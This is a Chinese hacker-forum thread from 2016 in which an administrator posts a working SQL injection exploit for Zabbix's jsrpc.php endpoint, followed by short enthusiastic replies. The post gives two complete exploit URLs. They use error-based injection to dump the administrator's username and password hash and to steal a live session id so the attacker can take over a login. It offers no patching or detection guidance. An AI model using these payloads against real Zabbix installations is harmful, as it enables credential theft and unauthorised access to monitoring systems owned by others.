搜索
查看: 692|回复: 5

Zabbix最新SQL注射漏洞利用

[复制链接]

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2016-8-18 09:56:29 | 显示全部楼层 |阅读模式

freebuf刚爆Zabbix的sql注入:http://www.freebuf.com/vuls/112197.html

漏洞测试:

爆用户名和密码:

  1. http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(alias,0x7e,passwd,0x7e) from users limit 1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
复制代码

爆sessionid(可替换刷新登陆)

  1. http://192.168.1.13/zabbix/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=(select (1) from users where 1=1 aNd (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (select concat(sessionid,0x7e,userid,0x7e,status) from sessions where status=0 and userid=1 LIMIT 0,1)),1,62)))a from information_schema.tables group by a)b))&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17
复制代码


过段时间可能会取消签到功能了

0

主题

3

帖子

27

积分

我是新手

Rank: 1

积分
27
发表于 2016-8-18 10:09:56 | 显示全部楼层
好贴,前排留名

1

主题

9

帖子

69

积分

我是新手

Rank: 1

积分
69
发表于 2016-8-18 10:10:52 | 显示全部楼层
真是速度快啊
zhuchenkaitest 该用户已被删除
发表于 2016-8-18 10:14:42 | 显示全部楼层
只为POC而来

0

主题

2

帖子

66

积分

我是新手

Rank: 1

积分
66
发表于 2016-8-18 10:19:28 | 显示全部楼层
我带着灌水大军来了

0

主题

5

帖子

25

积分

我是新手

Rank: 1

积分
25
发表于 2016-8-18 14:17:15 | 显示全部楼层
我是来学习的
您需要登录后才可以回帖 登录 | Join BUC

本版积分规则

Powered by Discuz!

© 2012-2015 Baiker Union of China.

快速回复 返回顶部 返回列表